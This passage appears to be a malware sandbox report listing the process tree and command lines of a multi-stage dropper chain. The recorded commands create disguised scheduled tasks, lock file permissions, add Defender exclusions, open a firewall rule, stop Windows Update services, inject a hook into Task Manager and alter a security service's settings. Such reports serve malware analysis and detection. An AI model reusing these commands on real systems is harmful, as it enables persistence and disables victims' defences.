PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3912 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe
PID 3912 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe
PID 3912 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe
PID 2608 wrote to memory of 2464 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2A18.exe
PID 2608 wrote to memory of 2464 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2A18.exe
PID 2608 wrote to memory of 2464 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2A18.exe
PID 2464 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\2A18.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe
PID 2464 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\2A18.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe
PID 2464 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\2A18.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe
PID 1564 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe
PID 1564 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe
PID 1564 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe
PID 3152 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe
PID 3152 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe
PID 3152 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe
PID 3532 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe
PID 3532 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe
PID 3532 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe
PID 2608 wrote to memory of 1696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2CD8.exe
PID 2608 wrote to memory of 1696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2CD8.exe
PID 2608 wrote to memory of 1696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2CD8.exe
PID 3920 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe
PID 3920 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe
PID 3920 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe
PID 2608 wrote to memory of 4444 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2DE3.bat
PID 2608 wrote to memory of 4444 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2DE3.bat
PID 2608 wrote to memory of 4444 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2DE3.bat
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\2CD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\2CD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\2CD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 912 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe

"C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2892 -ip 2892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 576

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1808 -ip 1808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe

C:\Users\Admin\AppData\Local\Temp\2A18.exe

C:\Users\Admin\AppData\Local\Temp\2A18.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe

C:\Users\Admin\AppData\Local\Temp\2CD8.exe

C:\Users\Admin\AppData\Local\Temp\2CD8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe

C:\Users\Admin\AppData\Local\Temp\2DE3.bat

"C:\Users\Admin\AppData\Local\Temp\2DE3.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1696 -ip 1696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 912 -ip 912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4948 -ip 4948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 540

C:\Users\Admin\AppData\Local\Temp\30C2.exe

C:\Users\Admin\AppData\Local\Temp\30C2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4112 -ip 4112

C:\Users\Admin\AppData\Local\Temp\3160.exe

C:\Users\Admin\AppData\Local\Temp\3160.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EBC.tmp\2EBD.tmp\2EBE.bat C:\Users\Admin\AppData\Local\Temp\2DE3.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 388

C:\Users\Admin\AppData\Local\Temp\37C9.exe

C:\Users\Admin\AppData\Local\Temp\37C9.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pg975PN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pg975PN.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8d7b946f8,0x7ff8d7b94708,0x7ff8d7b94718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8d7b946f8,0x7ff8d7b94708,0x7ff8d7b94718

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,12578530505721159643,8959805834061612385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\6A06.exe

C:\Users\Admin\AppData\Local\Temp\6A06.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\76C8.exe

C:\Users\Admin\AppData\Local\Temp\76C8.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\7C09.exe

C:\Users\Admin\AppData\Local\Temp\7C09.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\8263.exe

C:\Users\Admin\AppData\Local\Temp\8263.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5144 -ip 5144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

